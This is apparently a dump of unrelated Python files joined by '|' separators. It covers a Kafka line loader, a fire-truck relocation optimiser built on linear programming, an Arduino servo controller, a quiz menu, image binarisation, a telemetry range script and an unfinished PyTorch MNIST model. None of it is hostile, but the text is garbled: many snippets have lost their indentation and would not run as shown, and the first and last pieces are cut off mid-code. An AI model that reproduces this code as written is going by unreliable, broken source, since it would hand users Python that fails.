error_path = get_error_path(fin_path)
producer = KafkaProducer(bootstrap_servers=get_kafka_brokerlist())
with open(fin_path) as fin,open(error_path,'a') as ferror:
fin.seek(offset)
for raw_line in fin:
current_offset += len(raw_line)
config['offset'] = current_offset
print("offset : %s" % current_offset)
line = raw_line.rstrip('\n')
num_column = len(line.split(","))
#producer.send('raw', raw_line.encode('utf-8'))
if num_column >= recommend :
producer.send(get_kafka_topic() , raw_line.encode('utf-8'))
else:
error_number += 1
ferror.write(raw_line)
if line_number < interval :
line_number += 1
else :
refresh_yaml()
line_number = 0
producer.flush()
error(fin_path,error_path,get_final_error_path(fin_path),error_number)
def get_local_ip():
try:
csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
csock.connect(('8.8.8.8', 80))
(addr, port) = csock.getsockname()
csock.close()
return addr
except socket.error:
return "127.0.0.1"
def get_datetime():
datetime_now = datetime.now()
return datetime_now
def get_data():
data = "ip:%s,starttime:%s,filepath:%s,learning:%s,offset:%s,column:%s" % \
(get_local_ip(),get_datetime(),config['filepath'],config['learning'], \
config['offset'],config['column'])
return {"status":"error","data":data}
def init():
print(config)
def run() :
init()
fin_path = config['filepath']
offset = config['offset']
interval = config['interval']
recommend = get_column_by_score(fin_path)
extract_to_kafka(fin_path,offset,interval,recommend)
if __name__ == "__main__" :
run()
|
A=int(input("A= "))
print((A > 99) and (A < 1000) and (A % 2 != 0))
|
import sys
sys.path.insert(0, '/usr/local/blocked')
from BlockedFrontend.server import app as application
|
from django.apps import AppConfig
class CustomstrategyConfig(AppConfig):
name = 'CustomStrategy'
    verbose_name='自定义策略'  # i.e. "custom strategy"
|
def filter_long_words(sentence, n):
return [x for x in sentence.split() if len(x)>n]
'''
Write a function filter_long_words that takes a string sentence and an integer n.
Return a list of all words that are longer than n.
Example:
filter_long_words("The quick brown fox jumps over the lazy dog", 4)
= ['quick', 'brown', 'jumps']
'''
|
import cv2
import numpy as np
from PIL import Image
def binarize(img):
'''
    functions:
        Binarize the captured (cropped) image.
'''
    # -- Convert PIL.Image.Image to OpenCV format
    # and convert to a grayscale image
img = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
    # set a threshold and binarize
threshold = 200
param = cv2.THRESH_BINARY
ret,processed = cv2.threshold(img,threshold,255,param)
print(type(processed))
#cv2.imshow("win100",img)
#cv2.imshow("win001",processed)
#cv2.waitKey(0)
    return processed  # the binarized image, as a numpy.ndarray
for i in range(0,13):
filename = str(i)+".png"
print(filename)
temp = cv2.imread(filename)
#cv2.imshow(filename,temp)
#cv2.waitKey(0)
cv2.imwrite("bin/"+filename,binarize(temp))
|
import os
import numpy as np
import pandas as pd
import pickle
import msgpack
import copy
import pulp
from fdsim.helpers import create_service_area_dict
import sys; sys.path.append("../../work")
from spyro.utils import obtain_env_information, make_env, progress
STATION_NAME_TO_AREA = {
'ANTON': '13781551',
'AALSMEER': '13670052',
'AMSTELVEEN': '13710131',
'DIRK': '13780387',
'DIEMEN': '13560037',
'DRIEMOND': '13780419',
'DUIVENDRECHT': '13750041',
'HENDRIK': '13780449',
'NICO': '13781234',
'UITHOORN': '13760075',
'OSDORP': '13780011',
'PIETER': '13780057',
'TEUNIS': '13780583',
'VICTOR': '13780255',
'WILLEM': '13780402',
'IJSBRAND': '13780162',
'ZEBRA': '13780194'
}
STATION_AREA_TO_NAME = {value: key for key, value in STATION_NAME_TO_AREA.items()}
STATION_NAMES = ['AALSMEER', 'AMSTELVEEN', 'ANTON', 'DIEMEN', 'DIRK', 'DRIEMOND',
'DUIVENDRECHT', 'HENDRIK', 'IJSBRAND', 'NICO', 'OSDORP', 'PIETER',
'TEUNIS', 'UITHOORN', 'VICTOR', 'WILLEM', 'ZEBRA']
NUM_STATIONS = len(STATION_NAMES)
STATION_NAME_TO_ACTION = {STATION_NAMES[i]: i for i in range(len(STATION_NAMES))}
def save_station_areas(save_path='./data/updated_kazerne_set.msg'):
"""Save the set of areas in which there is a fire station.
Parameters
----------
save_path: str
The path to save the msgpack file.
"""
new_kazerne_set = list(STATION_NAME_TO_AREA.values())
with open(save_path, 'wb') as f:
msgpack.pack(new_kazerne_set, f)
return new_kazerne_set
def create_new_rates_dict(incidents, kvt_path, station_mapping=STATION_NAME_TO_AREA, vehicle_type='TS',
loc_col='hub_vak_bk', save=False, save_path='./data/updated_rates_dict.msg'):
"""Calculate the overall incident rates per service area and return / save them in the format
required by the MCRP Agent.
Parameters
----------
incidents: pd.DataFrame
The incident data. Must be filtered to all relevant cases (e.g., incidents with a deployment
of the vehicle type of interest or with high priority); all we do here is count
the number of incidents in each service area.
kvt_path: str
Path to the KVT data.
station_mapping: dict
Like {'STATION_NAME' -> 'area_code'}. Must contain all relevant stations.
vehicle_type: str, one of ['TS', 'HV', 'RV', 'WO']
The vehicle type to consider.
"""
service_areas = create_service_area_dict(kvt_path, station_filter=list(station_mapping.keys()))
rates = {}
for s, locs in service_areas[vehicle_type].items():
rates[STATION_NAME_TO_AREA[s]] = int(np.sum(np.in1d(incidents[loc_col].values, locs)))
if save:
with open(save_path, 'wb') as f:
msgpack.pack(rates, f)
return rates
def create_new_travel_time_input(path, areas, in_minutes=True, save=False, save_path='./data/updated_traveltimes.pickle'):
"""Create a matrix of travel / relocation times between the areas that have
a fire station.
Parameters
----------
path: str
The path to the full time matrix.
areas: list(str)
The area codes in which there is a station.
in_minutes: bool, default=True
If True, reports travel time in minutes, otherwise in seconds.
save: bool, default=True
Whether to save the resulting matrix at save_path.
save_path: str, default='./data/updated_traveltimes.pickle'
The path to save the result as a pickle.
Returns
-------
travel_matrix: pd.DataFrame
Matrix of shape [len(areas), len(areas)], with the travel times.
"""
time_matrix = pd.read_csv(path, index_col='index', dtype={'index': str})
travel_times = time_matrix.loc[areas, areas]
if in_minutes:
travel_times = np.round(travel_times / 60, 1)
if save:
pickle.dump(travel_times, open(save_path, 'wb'))
return travel_times
def build_rn(vaks, disp_order, kazerne_set, size):
"""Construct response neighborhoods (RNs) for a given RN size (number of fire stations).
Parameters
----------
vaks: array
The demand location IDs.
disp_order: pd.DataFrame
With columns 'vak', 'kazerne', and 'order', specifying the order of priority
in which an area ('vak') is served by the fire stations.
kazerne_set: list
The set of demand locations in which a station is positioned.
size: int
The size of the Response Neighborhood.
"""
cols = np.concatenate((['vak_nr'], ['kazerne_' + s for s in map(str, np.arange(1, size + 1))]))
    # find the 'size' closest stations for each square and order them alphabetically
    rn_sets = pd.DataFrame(columns=cols)
    for vak in vaks:
        rn = disp_order[disp_order.vak == vak].sort_values(by=['order'])['kazerne'][0:size]
        rn = rn.sort_values()
rn = pd.DataFrame([tuple(np.concatenate(([vak],rn)))], columns = cols)
rn_sets = rn_sets.append(rn, ignore_index=True)
# leave only unique combinations of the 'size' closest stations, create id for each unique RN
rn_set = rn_sets[['kazerne_' + s for s in map(str, np.arange(1, size + 1))]].drop_duplicates()
rn_set['rn_id'] = pd.Series(range(len(rn_set['kazerne_1'])), index=rn_set.index)
# construct the incidence matrix
A = np.zeros((len(kazerne_set), rn_set.shape[0]))
for i in rn_set.index:
for j in range(len(kazerne_set)):
if (kazerne_set[j] in list(rn_set.loc[i][0:size])):
A[j, rn_set.loc[i][size]] = 1
return A
def construct_rn_matrices(traveltimes, kazerne_set, save=False, save_path='./data/rn_matrices.pickle'):
"""Construct the Response Neighborhoods matrices.
Parameters
----------
traveltimes: pd.DataFrame
The travel times between every set of demand locations.
kazerne_set: list
The set of demand locations in which a station is positioned.
Returns
-------
matrices: list of np.arrays
The matrices for response neighborhoods of size 1, 2, ..., len(kazerne_set).
"""
traveltimes_station = traveltimes[kazerne_set]
vaks = list(traveltimes.index.values)
N = len(kazerne_set)
disp_order = pd.DataFrame(columns=['vak', 'kazerne', 'order'])
service_areas = []
for index, row in traveltimes_station.iterrows():
disp_order = disp_order.append(pd.DataFrame(
{'vak': [index for x in range(N)],
'kazerne': list(row.sort_values().index.values),
'order': range(N)}
)
)
service_areas.append([index, list(row.sort_values().index.values)[0]])
# Construct RN's of different sizes
Incidence = []
for size in range(1, N + 1):
print('size: ', size)
A = build_rn(vaks, disp_order, kazerne_set, size)
Incidence.append(A)
if save:
pickle.dump(Incidence, open(save_path, 'wb'))
return Incidence
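# Hedged usage sketch for the data-preparation helpers above (the file path is a
# placeholder, not the project's actual path):
#   kazerne_set = save_station_areas()
#   travel_times = create_new_travel_time_input('data/full_time_matrix.csv', kazerne_set, save=True)
#   rn_matrices = construct_rn_matrices(travel_times, kazerne_set, save=True)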
def extract_vehicles_from_state(state):
return state[:NUM_STATIONS]
def extract_current_destination_area(state):
return STATION_NAME_TO_AREA[
STATION_NAMES[np.flatnonzero(state[NUM_STATIONS:(2 * NUM_STATIONS)])[0]]
]
def area_to_action(area):
if area is None:
return NUM_STATIONS
else:
return STATION_NAME_TO_ACTION[STATION_AREA_TO_NAME[area]]
class MCRPAgent():
"""Agent based on _Fire Truck Relocation During Major Incidents_ (Usanov et al., 2019)."""
def __init__(self, W=1, trucks_per_rn=1, kazerne_path='./data/updated_kazerne_set.msg', regions_path='./data/Incidence.p',
travel_times_path='./data/updated_traveltimes.pickle', rates_path='./data/updated_rates_dict.msg'):
"""Load required data and save parameters."""
# load data
with open(kazerne_path, "rb") as f:
self.kazerne_set = msgpack.unpackb(f.read(), raw = False)
self.incidence = pickle.load(open(regions_path, "rb"))
self.traveltimes_fs = pickle.load(open(travel_times_path, "rb"))
with open(rates_path, "rb") as f:
self.rates_dict = msgpack.unpackb(f.read(), raw=False)
# parameters for willingness to relocate (W) and
# minimum number of trucks per response neighborhood
self.W = W
self.trucks_per_rn = trucks_per_rn
def evaluate(self, env_cls, n_episodes=10000, tmax=None, env_params=None):
"""Evaluate the agent on an environemt without training.
Parameters
----------
env_cls: uninitialized Python class or str
The environment to train on. If a class is provided, it must be uninitialized.
Parameters can be passed to the environment using env_params. If a string
is provided, this string is fed to `gym.make()` to create the environment.
n_episodes: int, optional, default=10,000
The number of episodes to run.
tmax: int, optional, default=None
The maximum number of steps to run in each episode. If None, set to 10,000 to
not enforce a limit in most environments.
env_params: dict, optional, default=None
Dictionary of parameter values to pass to `env_cls` upon initialization.
"""
if tmax is None:
self.tmax = 10000
else:
self.tmax = tmax
self.env = make_env(env_cls, env_params)
self.action_shape, self.n_actions, self.obs_shape, _ = \
obtain_env_information(env_cls, env_params)
self.episode_counter = 0
self.step_counter = 0
self.done = True
self.eval_results = {
"total_episode_reward": np.zeros(n_episodes),
"mean_episode_reward": np.zeros(n_episodes),
"episode_length": np.zeros(n_episodes),
}
seen_states = {}
for ep in range(n_episodes):
self.state = np.asarray(self.env.reset(), dtype=np.int16)
self.episode_step_counter = 0
self.episode_reward = 0
for i in range(self.tmax):
# get relocations from dictionary if problem was solved before
# otherwise solve it and save the results for next time
try:
relocations = seen_states[tuple(extract_vehicles_from_state(self.state))]
except KeyError:
relocations = self.get_relocations(self.state)
seen_states[tuple(extract_vehicles_from_state(self.state))] = relocations
# get origin if current destination is in the relocations
to_from = {d['to']: d['from'] for d in relocations.values()}
destination_area = extract_current_destination_area(self.state)
origin_area = to_from[destination_area] if destination_area in list(to_from.keys()) else None
# select and perform action
self.action = area_to_action(origin_area)
new_state, self.reward, self.done, _ = self.env.step(self.action)
# bookkeeping
self.step_counter += 1
self.episode_reward += self.reward
self.episode_step_counter += 1
self.state = np.asarray(copy.copy(new_state), dtype=np.int16)
# end of episode
if self.done:
break
self.eval_results["total_episode_reward"][ep] = self.episode_reward
self.eval_results["mean_episode_reward"][ep] = self.episode_reward / self.episode_step_counter
self.eval_results["episode_length"][ep] = self.episode_step_counter
progress("Completed episode {}/{}".format(ep + 1, n_episodes),
same_line=(ep > 0), newline_end=(ep + 1 == n_episodes))
return self.eval_results
def _state_to_fleet_dict(self, state):
"""Translate an array of vehicles per station to the fleet dict required
for the MCRP algorithm.
"""
vehicles = extract_vehicles_from_state(state)
return {STATION_NAME_TO_AREA[STATION_NAMES[i]]: [vehicles[i], vehicles[i]]
for i in range(len(vehicles))}
def get_relocations(self, state):
"""Get the relocations for a given vehicles availability.
Assumes all vehicles in `vehicles` are available for relocation.
Parameters
----------
state: array-like, 1D
The number of vehicles available at the stations, in the order
of STATION_NAMES, plus further observations.
Returns
-------
        relocations: dict
            The relocations suggested by the MCRP-LBAP solution, like
            {1: {'from': 'area code', 'to': 'area code'}, ...}; empty if no
            feasible relocation plan was found.
"""
fleet = self._state_to_fleet_dict(state)
return self._get_relocations_from_fleet(fleet)
def _get_relocations_from_fleet(self, fleet_dict):
"""Get the relocations suggested by the MCRP-LBAP solution for a given fleet."""
for s in range(1, len(self.kazerne_set)):
A = self.incidence[s - 1]
opt_model, relocations, fleet_after = self._solve_mcrp(A, fleet_dict)
if opt_model.status == 1:
movements = self._solve_lbap(relocations)
return movements
return {}
def _solve_mcrp(self, A, fleet_dict):
"""Solve the Maximum Coverage Relocation Problem."""
# arrival rates per service area
rates = [self.rates_dict[x] for x in self.kazerne_set]
# available fleet per station
        fleet = [fleet_dict[x][0] for x in self.kazerne_set]
        # available for relocation
        active = [fleet_dict[x][1] for x in self.kazerne_set]
        ## Sets used for iteration over fire stations (kazerne)
        ## and response neighborhoods (rn)
kazerne_range = range(len(self.kazerne_set))
rn_set = range(A.shape[1])
## Sets of station ID's
# empty stations
empty_id = [x for x in kazerne_range if fleet[x] == 0]
# stations with only one truck
single_id = [x for x in kazerne_range if fleet[x] == 1]
# stations with more than one truck
many_id = [x for x in kazerne_range if fleet[x] > 1]
## Model
# create 'opt_model' variable that contains problem data
opt_model = pulp.LpProblem("MCRP", pulp.LpMaximize)
## VARIABLES: if relocation is made from station i to station j
relocate = {(i, j):
pulp.LpVariable(cat='Binary',
name="relocate_{0}_{1}".format(i,j))
for i in kazerne_range for j in kazerne_range}
## VARIABLES: fleet after relocations are made
fleet_after = {i:
pulp.LpVariable(cat='Integer',
name="fleet_after_{0}".format(i))
for i in kazerne_range}
## VARIABLES: indicates if the station is unoccupied
unoccupied = {i:
pulp.LpVariable(cat='Binary',
name="unoccupied_{0}".format(i))
for i in many_id}
## OBJECTIVE
objective = pulp.lpSum((self.W*(rates[j] - rates[i]) + (self.W - 1))*relocate[(i, j)] for i in single_id for j in empty_id) \
+ pulp.lpSum((self.W*rates[j] + (self.W - 1))*relocate[(i, j)] for i in many_id for j in empty_id) \
+ pulp.lpSum(-self.W*rates[i]*unoccupied[i] for i in many_id)
# Constraint 1. Every RN should be covered by trucks_per_rn trucks
constraints_1 = {r:
pulp.LpConstraint(
e=pulp.lpSum(A[j][r]*fleet_after[j] for j in kazerne_range),
sense=pulp.LpConstraintGE,
rhs=self.trucks_per_rn,
name="constr_rn_{0}".format(r))
for r in rn_set}
# Constraint 2. Trucks flow control
constraints_2 = {i:
pulp.LpConstraint(
e= fleet_after[i] - pulp.lpSum(relocate[(j, i)] for j in kazerne_range) + pulp.lpSum(relocate[(i, j)] for j in kazerne_range),
sense=pulp.LpConstraintEQ,
rhs=fleet[i],
name="constr_move_{0}".format(i))
for i in kazerne_range}
# Constraint 3. Do not relocate more than available
constraints_3 = {i:
pulp.LpConstraint(
e=pulp.lpSum(relocate[(i, j)] for j in kazerne_range),
sense=pulp.LpConstraintLE,
rhs=active[i],
name="constr_reloc_avail_{0}".format(i))
for i in kazerne_range}
# Constraints 4. Fleet should be positive
constraints_4 = {i:
pulp.LpConstraint(
e=fleet_after[i],
sense=pulp.LpConstraintGE,
rhs=0,
name="constr_pos_fleet_{0}".format(i))
for i in kazerne_range}
# Constraint 5. Do not relocate more than 1 truck to the same empty station
constraints_5 = {i:
pulp.LpConstraint(
e=pulp.lpSum(relocate[(j, i)] for j in kazerne_range),
sense=pulp.LpConstraintLE,
rhs=1,
name="constr_single_truck_{0}".format(i))
for i in empty_id}
# Constraint 6. Do not relocate to full stations
constraints_6 = {(i, j):
pulp.LpConstraint(
e=relocate[(i, j)],
sense=pulp.LpConstraintEQ,
rhs=0,
name="constr_not_to_full_{0}_{1}".format(i, j))
for i in kazerne_range for j in kazerne_range if j not in empty_id}
# Constraint 7. Unoccupied consistency
constraints_7 = {i:
pulp.LpConstraint(
e=fleet_after[i]+unoccupied[i],
sense=pulp.LpConstraintGE,
rhs=1,
name="constr_unoccpd_consistency_{0}".format(i))
for i in many_id}
# add constraints to the model
for r in rn_set:
opt_model += constraints_1[r]
for i in kazerne_range:
opt_model += constraints_2[i]
opt_model += constraints_3[i]
opt_model += constraints_4[i]
for j in [x for x in kazerne_range if x not in empty_id]:
opt_model += constraints_6[(i, j)]
for i in empty_id:
opt_model += constraints_5[i]
for i in many_id:
opt_model += constraints_7[i]
# add objective to the model
opt_model += objective
# solve the model
opt_model.solve()
# output solution
try:
relocate_m = [[int(relocate[(i, j)].varValue) for j in kazerne_range] for i in kazerne_range]
fleet_after_m = [int(fleet_after[i].varValue) for i in kazerne_range]
        except Exception:
            # the solver did not produce values; fall back to the raw variables
            relocate_m = relocate
            fleet_after_m = fleet_after
return opt_model, relocate_m, fleet_after_m
def _solve_lbap(self, relocations):
"""Assign origin stations to destination stations by solving the
Linear Bottleneck Assignment Problem.
"""
# make the set of origins
# and the set of destinations
origins_list = [[x for y in range(len(relocations[x])) if relocations[x][y] > 0] for x in range(len(relocations))]
origins = [item for sublist in origins_list for item in sublist]
#origins = [x for x in range(len(kazerne_set)) if sum(relocations[x]) > 0]
destinations_list = [[y for y in range(len(relocations[x])) if relocations[x][y] > 0] for x in range(len(relocations))]
destinations = [item for sublist in destinations_list for item in sublist]
#destinations = [x for x in range(len(kazerne_set)) if sum([row[x] for row in relocations]) > 0]
# set of origins' indices
origin_set = range(len(origins))
# set of destinations' indices
destination_set = range(len(destinations))
## Model
# create 'opt_model' variable that contains problem data
opt_model = pulp.LpProblem("LBAP", pulp.LpMinimize)
# Relocation decision variables:
relocate = {(i, j):
pulp.LpVariable(cat='Binary',
name="relocate_{0}_{1}".format(i,j))
for i in origin_set for j in destination_set}
# Dummy decision variable - maximum travelling time
maxtime = {0:
pulp.LpVariable(cat='Continuous',
name="dummy_max")}
# Dummy decision variable - total travelling time of all except the maximum
totaltime = {0:
pulp.LpVariable(cat='Continuous',
name="dummy_total")}
## OBJECTIVE
# The objective is to minimize the maximum travelling time and then the total travelling time
objective = 1000*maxtime[0]+totaltime[0]
# Constraint 1. Every travel time should be less than the maximum travel time
constraints_1 = {(i, j):
pulp.LpConstraint(
e=self.traveltimes_fs.iloc[[origins[i]], [destinations[j]]].values[0][0]*relocate[(i, j)]-maxtime[0],
sense=pulp.LpConstraintLE,
rhs=0,
name="max_time_{0}_{1}".format(i, j))
for i in origin_set for j in destination_set}
# Constraint 2. Use each origin exactly once
constraints_2 = {i:
pulp.LpConstraint(
e=pulp.lpSum(relocate[(i, j)] for j in destination_set),
sense=pulp.LpConstraintEQ,
rhs=1,
name="reloc_or_{0}".format(i))
for i in origin_set}
# Constraint 3. Use each destination exactly once
constraints_3 = {i:
pulp.LpConstraint(
e=pulp.lpSum(relocate[(j, i)] for j in origin_set),
sense=pulp.LpConstraintEQ,
rhs=1,
name="reloc_dest_{0}".format(i))
for i in destination_set}
# Constraint 4. Definition of the totaltime dummy variable
constraints_4 = {0:
pulp.LpConstraint(
e=pulp.lpSum(self.traveltimes_fs.iloc[[origins[i]], [destinations[j]]].values[0][0]*relocate[(i, j)] for i in origin_set for j in destination_set)-totaltime[0],
sense=pulp.LpConstraintEQ,
rhs=0,
name="total_time")
}
# add objective to the model
opt_model += objective
# add constraints to the model
for i in origin_set:
opt_model += constraints_2[i]
for j in destination_set:
opt_model += constraints_1[(i, j)]
for i in destination_set:
opt_model += constraints_3[i]
opt_model += constraints_4[0]
# solve the model
opt_model.solve()
# output solution
try:
relocate_m = {}
indx = 1
for i in origin_set:
for j in destination_set:
if relocate[(i, j)].varValue > 0:
relocate_m[indx] = {'from': self.kazerne_set[origins[i]], 'to': self.kazerne_set[destinations[j]]}
indx += 1
except:
relocate_m = relocate
return relocate_m
|
from time import sleep
from interface.menus import *
pysolvers = ['\033[34mGabriel Correia (gothmate)',
'Pablo Narciso',
'Antonio (Tonny)',
'Eduardo Gonçalves',
'Ricardo Garcêz\033[m',
]
cabecalho('QUIZ PySolvers 2.0')
print('''\033[33mBem vindo ao Quiz Game.
Meu nome é Py15-A e vou te acompanhar nesse processo.
Você tem 3 chances! Não as desperdice.\033[m''')
while True:
sleep(1)
menuPrinc('ESCOLHA UMA OPÇÃO')
sleep(1)
opc = int(input('Escolha: '))
if opc == 1:
pergunta()
elif opc == 2:
while True:
menuOpc('OPÇÕES')
opc = int(input('Escolha uma opção: '))
if opc == 1:
print('Opção Som')
sleep(3)
elif opc == 2:
cabecalho('EQUIPE PySolvers')
for i in pysolvers:
print(f'{i}'.center(60))
sleep(3)
sleep(3)
else:
break
elif opc == 3:
print('\033[31mSaindo do jogo. Até a próxima...\033[m')
break
|
"""servos offers an interface for controlling motors that has been attached to an Arduino.
"""
import multiprocessing
import numpy as np
import logging
import time
import pyfirmata
class Servo(object):
# safety delay after changing the servos angle in case no particular number has been
# defined by the user
_safety_delay = 0.0005
# how many seconds it takes until pyFirmata and Arduino have been synchronized
_synchronization_time = 3
def __init__(
self,
pin: int,
port: str = "/dev/ttyACM0",
start_angle: float = 0,
allowed_range_of_angles: tuple = (0, 180),
# how long it takes to move 60 degrees, depending on the particular servo motor
# model that gets used
operating_speed: float = 0.11,
# approximately how many degrees the motor moves with each step
move_to_grid_size: float = 0.1,
):
self._allowed_range_of_angles = allowed_range_of_angles
self._board = pyfirmata.Arduino(port)
self._pin = pin
self._operating_speed = operating_speed
self._operating_speed_per_degree = self._operating_speed / 60
self._move_to_grid_size = move_to_grid_size
# Set mode of the pin n as SERVO
self._board.digital[pin].mode = pyfirmata.SERVO
logging.info("synchronizing pyFirmata and Arduiono...")
# Need to give some time to pyFirmata and Arduino to synchronize
time.sleep(self._synchronization_time)
self._last_position = multiprocessing.Value("f", start_angle)
# move to start angle
self._set_angle(start_angle)
@property
def board(self) -> pyfirmata.Arduino:
return self._board
@property
def pin(self) -> int:
return self._pin
@property
def last_position(self) -> float:
return self._last_position.value
@last_position.setter
def last_position(self, value: float) -> None:
self._last_position.value = value
@property
def operating_speed(self) -> float:
return self._operating_speed
def _is_angle_in_allowed_range(self, angle: float) -> None:
try:
tests = (
angle >= self._allowed_range_of_angles[0],
angle <= self._allowed_range_of_angles[1],
)
assert all(tests)
except AssertionError:
msg = "Angle has to be in between {} and not {}!".format(
self._allowed_range_of_angles, angle
)
raise ValueError(msg)
def _set_angle(self, angle: float, sleep_duration: float = None) -> None:
if not sleep_duration:
sleep_duration = self._safety_delay
# check if angle is in allowed range
self._is_angle_in_allowed_range(angle)
self.board.digital[self.pin].write(angle)
self.last_position = angle
time.sleep(sleep_duration)
def move_to(self, angle: float, duration: float) -> None:
if angle != self.last_position:
degree2move = angle - self.last_position
estimated_duration = abs(degree2move * self._operating_speed_per_degree)
if estimated_duration > duration:
msg = "Servo motor is too slow to reach angle '{}' in '{}' ".format(
angle, duration
)
msg += "seconds from angle '{}'. Estimated duration is '{}'.".format(
self.last_position, estimated_duration
)
logging.warning(msg)
self._set_angle(angle)
elif estimated_duration == duration:
self._set_angle(angle)
else:
step_size = degree2move / round(degree2move / self._move_to_grid_size)
n_steps = abs(int(degree2move / step_size))
step_duration = duration / n_steps
for angle in np.linspace(
self.last_position, angle, n_steps, dtype=float
):
self._set_angle(angle, step_duration)
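# --- Hedged usage sketch (not part of the original module) ---
# Assumes an Arduino running Firmata on /dev/ttyACM0 with a servo signal wire on pin 9;
# both the pin number and the target angles below are illustrative only.
if __name__ == "__main__":
    demo_servo = Servo(pin=9)
    # sweep to 90 degrees over roughly two seconds, then back to 0
    demo_servo.move_to(90, duration=2.0)
    demo_servo.move_to(0, duration=2.0)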
|
import csv
import random
man = list(range(100,150,1))
woman = list(range(200,250,1))
with open('kekka.csv', 'w') as f:
for M in man:
for F in woman:
f.write(str(M) + "," + str(F) + "," + str(random.randint(1,1000)) + "\n")
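# The csv module imported above is never used; a minimal equivalent sketch using
# csv.writer (same output columns, illustrative only, left commented out so the file
# is not written twice) would be:
#
# with open('kekka.csv', 'w', newline='') as f:
#     writer = csv.writer(f)
#     for M in man:
#         for F in woman:
#             writer.writerow([M, F, random.randint(1, 1000)])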
|
import time
import traceback
import multiprocessing
from functions.plot_manager import setup_backend_for_saving
from functions.process_functions import find_homographies_per_thread
from objects.constants import Constants
from objects.homography import Homography
from objects.images import TemplateImage, TestImage
from objects.plot_discarded import PlotDiscarded
from objects.ratio import RatioList
class ProcessHandler(multiprocessing.Process):
def __init__(self, test_image: TestImage, template: TemplateImage, return_dict, ratio_list, plot_dict):
super().__init__()
self.test_image: TestImage = test_image
self.template: TemplateImage = template
self.homographies: [Homography] = []
# ratio list shared between the processes
self.ratio_list = RatioList(self.test_image.image)
# ratio list for a single process
# self.ratio_list = RatioList(test_image.image)
self.return_dict = return_dict
self.plot_dict = plot_dict
self.plots: [PlotDiscarded] = []
def run(self):
try:
self.plot_dict[self.template.name] = []
self.return_dict[self.template.name] = []
tic = time.time()
find_homographies_per_thread(self.template, self.test_image, self.ratio_list,
self.homographies, self.plots)
toc = time.time()
t = round(toc - tic, 2)
print("{} -> found: {}, discarded: {}, time: {}".format(self.template.name, len(self.homographies),
len(self.plots), t))
self.plot_dict[self.template.name] = self.plots
self.return_dict[self.template.name] = self.homographies
except:
traceback.print_exc()
|
t = int(input())
while t > 0:
import math
n,k = map(int,input().split())
arr = []
for i in range(k+1,n+1,+1):
arr.append(i)
x = math.ceil(k/2)
for i in range(x,k,+1):
arr.append(i)
print(len(arr))
print(*arr,sep=" ")
t = t-1
|
def calculate_total_weight(doc, method):
    from frappe.utils import flt
    total_net_weight = 0.0
    for x in doc.items:
        x.weight = flt(x.weight_per_unit) * flt(x.qty)
        total_net_weight += x.weight  # accumulate each item's weight into the total
    doc.total_net_weight = total_net_weight
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#############################################################################
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: May 20, 2019 #
# #
#############################################################################
import os
import sys
import re
import string
import random
import math
import sqlite3
import unittest
import time
import numpy
import astropy.io.fits as pyfits
import Chandra.Time
#
#--- reading directory list
#
path = '/data/mta/Script/MTA_limit_trends/Scripts3.83.6/house_keeping/dir_list'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append path to a private folder
#
sys.path.append(mta_dir)
sys.path.append(bin_dir)
#
import mta_common_functions as mcf #---- mta common functions
import envelope_common_function as ecf #---- collection of functions used in envelope fitting
import find_moving_average as fma #---- moving average
import find_moving_average_bk as fmab #---- moving average (backword fitting version)
#
#--- set a temporary file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#-----------------------------------------------------------------------------------
#-----------------------------------------------------------------------------------
#-----------------------------------------------------------------------------------
def find_range(msid_list):
mfile = house_keeping + msid_list
data = mcf.read_data_file(mfile)
sline = ''
for ent in data:
atemp = re.split('\s+', ent)
msid = atemp[0]
mc = re.search('#', msid)
if mc is not None:
continue
group = atemp[1]
fits = data_dir + group + '/' + msid + '_data.fits'
try:
f = pyfits.open(fits)
fdata = f[1].data
f.close()
except:
continue
vals = fdata[msid]
blim = numpy.percentile(vals, 1)
tlim = numpy.percentile(vals, 99)
if blim == tlim:
vmin = blim
vmax = tlim
blim = min(vals)
tlim = max(vals)
if blim == tlim:
vmin = blim
vmax = tlim
else:
selc = (vals > blim) & (vals < tlim)    # boolean mask, not a one-element list
svals = vals[selc]
if len(svals) > 0:
vmin = min(svals)
vmax = max(svals)
else:
vmin = min(vals)
vmax = max(vals)
if vmin == vmax:
vmin -= 1
vmax += 1
if len(msid) < 8:
msid = msid + '\t'
if len(group)< 8:
tgroup = group + '\t'
else:
tgroup = group
if abs(vmin) > 10:
line = msid + '\t' + tgroup + '\t' + '%3.1f' % (round(vmin, 1)) + '\t'
line = line + '%3.1f' % (round(vmax, 1)) + '\t0.011\n'
elif abs(vmin) > 1:
line = msid + '\t' + tgroup + '\t' + '%3.2f' % (round(vmin, 2)) + '\t'
line = line + '%3.2f' % (round(vmax, 2)) + '\t0.011\n'
else:
line = msid + '\t' + tgroup + '\t' + '%2.4f' % (round(vmin, 4)) + '\t'
line = line + '%2.4f' % (round(vmax, 4)) + '\t0.011\n'
sline = sline + line
with open('out', 'w') as fo:
    fo.write(sline)
#--------------------------------------------------------------------------------------
if __name__ == '__main__':
msid_list = sys.argv[1]
find_range(msid_list)
|
#coding: utf-8
#1.import packages
import torch
import torchvision
from torch import nn, optim
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import datasets
#2.Def Hyperparameters
batch_size = 100
learning_rate = 0.05
num_epoches = 50
#3.import MNIST
data_tf = torchvision.transforms.Compose( # preprocess the data
[
torchvision.transforms.ToTensor(), #(0 ,1)
torchvision.transforms.Normalize([0.5],[0.5]) #(-1,1)
]
)
data_path = r'C:\Users\ssunki\Anaconda3\MNIST' #import the dataset
train_dataset = datasets.MNIST(data_path, train=True, transform=data_tf, download=False)
test_dataset = datasets.MNIST(data_path, train=False, transform=data_tf, download=False)
train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True,num_workers=0) #import iteration data
test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False,num_workers=0)
#4.Def net Model
class Emm(nn.Module):
def __init__(self): #dim,classify
super(Emm, self).__init__() # Cnn inherit nn.Module
self.conv = nn.Sequential(
nn.Conv2d(1, 16, 3,2,1), # parameters: in_channels, out_channels, kernel_size, stride, padding
